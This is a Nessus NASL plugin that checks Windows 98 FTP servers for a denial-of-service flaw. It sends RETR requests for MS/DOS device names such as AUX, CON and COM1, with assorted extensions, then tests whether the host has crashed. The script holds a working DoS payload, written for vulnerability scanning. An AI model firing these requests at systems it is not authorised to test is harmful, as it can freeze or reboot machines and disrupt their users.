# # This script was written by Michel Arboi # # This script is a copy of http_w98_devname_dos.nasl. Making both # test in the same file could have increase the run time if several # web servers ran on the machine. # # See the Nessus Scripts License for details # if(description) { script_name("HTTP Windows 98 MS/DOS device names DOS"); desc["english"] = " It was possible to freeze or reboot Windows by reading a MS/DOS device through FTP, using a file name like CON\CON, AUX.htm or AUX. A cracker may use this flaw to make your system crash continuously, preventing you from working properly. Solution : upgrade your system or use a FTP server that filters those names out. Risk factor : High"; desc["francais"] = " Il a été possible de geler ou faire rebooter Windows en lisant un périphérique MS/DOS par FTP, via un nom comme CON\CON, AUX.htm ou AUX. Un pirate peut utiliser ce problème pour faire continuellement rebooter votre système, vous empêchant de travailler correctement. Solution : mettez à jour votre système ou utilisez un serveur FTP qui filtre ces noms. Facteur de risque : Elevé"; script_description(english:desc["english"], francais:desc["francais"]); summary["english"] = "Crashes Windows 98"; summary["francais"] = "Fait planter Windows 98"; script_summary(english:summary["english"], francais:summary["francais"]); script_category(ACT_DENIAL); script_copyright("This script is Copyright (C) 2001 Michel Arboi"); family["english"] = "Denial of Service"; family["francais"] = "Déni de service"; script_family(english:family["english"], francais:family["francais"]); script_dependencies("find_service.nes", "ftp_anonymous.nasl"); script_requires_ports("Services/ftp", 21); exit(0); } # The script code starts here login = get_kb_item("ftp/login"); pass = get_kb_item("ftp/password"); # login = "ftp"; # pass = "testat_private"; if ((! login) || safe_checks()) exit(0); start_denial(); dev[0] = "aux"; dev[1] = "con"; dev[2] = "prn"; dev[3] = "clock$"; dev[4] = "com1"; dev[5] = "com2"; dev[6] = "lpt1"; dev[7] = "lpt2"; ext[0] = ".foo"; ext[1] = "."; ext[2] = ". . .. ... .. ."; ext[3] = "-"; port = get_kb_item("Services/ftp"); if(!port)port = 21; if(get_port_state(port)) { for (i = 0; dev[i]; i = i + 1) { d = dev[i]; for (j = 0; ext[j]; j = j + 1) { e = ext[j]; if (e == "-") name = string(d, "/", d); else name = string(d, e); soc = open_sock_tcp(port); if(soc) { if (ftp_log_in(socket:soc, user:login, pass:pass)) { port2 = ftp_get_pasv_port(socket:soc); soc2 = open_sock_tcp(port2, transport:get_port_transport(port)); req = string("RETR ", name, "\r\n"); send(socket:soc, data:req); if (soc2) close(soc2); close(soc); } } } } } alive = end_denial(); if(!alive) { security_hole(port); set_kb_item(name:"Host/dead", value:TRUE); }